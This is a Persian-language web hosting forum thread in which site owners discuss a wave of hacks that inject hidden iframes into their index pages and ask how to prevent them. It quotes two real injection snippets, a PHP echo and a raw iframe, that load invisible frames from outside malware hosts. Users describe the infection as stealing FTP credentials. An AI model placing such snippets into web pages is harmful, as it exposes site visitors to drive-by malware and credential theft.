سلام
دوستان جدیدا اطلاع دارید که هک های
<?php
echo "<iframe src=\"http://brugeni.net/?click=5F7A23\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>
در حال حاضر زیاد شده کسی راهی برای جلوگیری از این بلده ؟
-----------
سلام
دوستان جدیدا اطلاع دارید که هک های
<?php
echo "<iframe src=\"http://brugeni.net/?click=5F7A23\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>
در حال حاضر زیاد شده کسی راهی برای جلوگیری از این بلده ؟
-----------
میشه یه توضیحی بدید؟
برای پیش رفت در علم آسانسوری وجود ندارد پله ها را باید پیاده رفت /./ همیشه این یادتان باشد که دست بالای دست بسیار است.
يادمان باشد براي يك بار ايستادن صد ها بار افتاده ايم /./ بک آپ مهمترین رمز موفقیت هاستینگ /./ امنیت مطلق نیست.ارتباط مستقیم با من :
Admin -{(@)}- WebHostingTalk . ir
این همون کدی هستش که به کدهای سایت ها افزوده میشه.
موتور جستجوی گوگل و خیلی از مرورگرها سایتی که اینجور کدها در اون باشه رو مخرب تشخیص میده و حتی تا جایی پیش میره که گوگل سایت رو به بلک لیست میبره.
هنوز کسی نمیدونه اینجور اسکریپت ها چگونه وارد کدها میشوند و من هم هنوز چیزی نشنیدم.
نکته جالب اینجاست که من چند روز پیش یه کد جاوا اسکریپت هم دیدم که بصورت جالبی به اسکریپت ها افزوده شده بود. اخطاری مرورگر نمیداد ولی سرعت لود سایت رو خیلی پایین می آورد.
تا یادم نرفته این رو هم بگم که یکسری از این کدها خودشون رو در تمام فایل های index کپی میکنن.
آره دقیق همین هم هست فقط کافی هست یه فایل اینجوری بشه !!
3 سوت تمام اندکس ها رو خراب می کنه !!
می خوام ببینم کسی جلوگیری از این رو می دونه !!
سرعت لود سایت رو خیلی میاره پایین چون مخفیانه فایلی رو روی سیستم شما نصب می کنه !
و از اون به بعد طبق مطالعه که من در یک سایت داشتم الان لینک اون یادم نیست
نوشته بود که صفحات وب رو آلوده می کنه و تمام یوزر نیم و پسورد های نرم افزار های CuteFTP ، LeapFTP و از این جور نرم افزار ها که با FTP کار می کنند رو برای نویسنده این ویروس ارسال می کنه و اگر بیننده ای سایت آلوده رو مشاهده کنه این اتفاق هم برای اون شخص می افته !
تازه چون این ویروس کد ویروس رو به صفحه وارد نمی کنه و فقط آدرس فایل رو وارد می کنه به این علت ویروس کش های سیستم های سرور قادر به شناسایی اونها نیستند !!
مگر اینکه اون فایل داخل خوده سرور اجرا بشه !!
حالا دوستان اگر تجربه ای دراین زمینه دارن خوشحال می شم مطرح کنند
هعمون موقع که من با این مشکل مواجه شدم ، گفتند که مشکل از آپدیت نبودن php و apache هستش.
البته هاست متعلق به من نبود و بعد از آپدیت دیگه چنین مشکلی مشاهده نشد.
در حال حاضر
Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9 Server at sodahost.net Port 80
---------
فکر نکنم نسخه جدید تری از PHP و apache اومده باشه !!
جالبه من هم به همچنین موردی برخوردم.
روز اول 2 تل از وب سایت ها و الان فقط www.uefa.ir آلوده شده.
هر روز دستی سریع فایلها رو جایگزین می کنم.
<iframe src="http://pogromski.is-a-geek.org:8080/ts/in.cgi?open10" width=197 height=0 style="visibility: hidden"></iframe>
هنوز هم راه حل مناسبی پیدا نکردم.
من فکر میکنم این یک ویروسه که از سیستم به داخل سایت ها میره...و از سایت به سیستم, !
باید دستی پاک کنید و یک ویندوزی عوض کنید...من یکبار چنین مشکلی داشتم.بعد از انجام این کار ها دیگه این مشکل رو نداشتم...
بعد از پاک کردن این خط از سایتتون, بعد از دو سه روز گوگل بازش میکنه...
با سلام
-----------
بله قبلا در Index اصلی سایت من این کد را قرار داده بودند (دانلود رایگان نرم افزار) و بعد من سریعا فهمیدم و پاکش کردم !
و گر نه...
خداحافظ !
این فایل یه نوع برنامه خرب هست که از روی سیستم شما وارد سرور می شه ، و می تونه یوزر و پسورد اف تی پی رو ارسال کنه ...
ارتباط تلگرامی با بخش فروش : pardisho@
در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)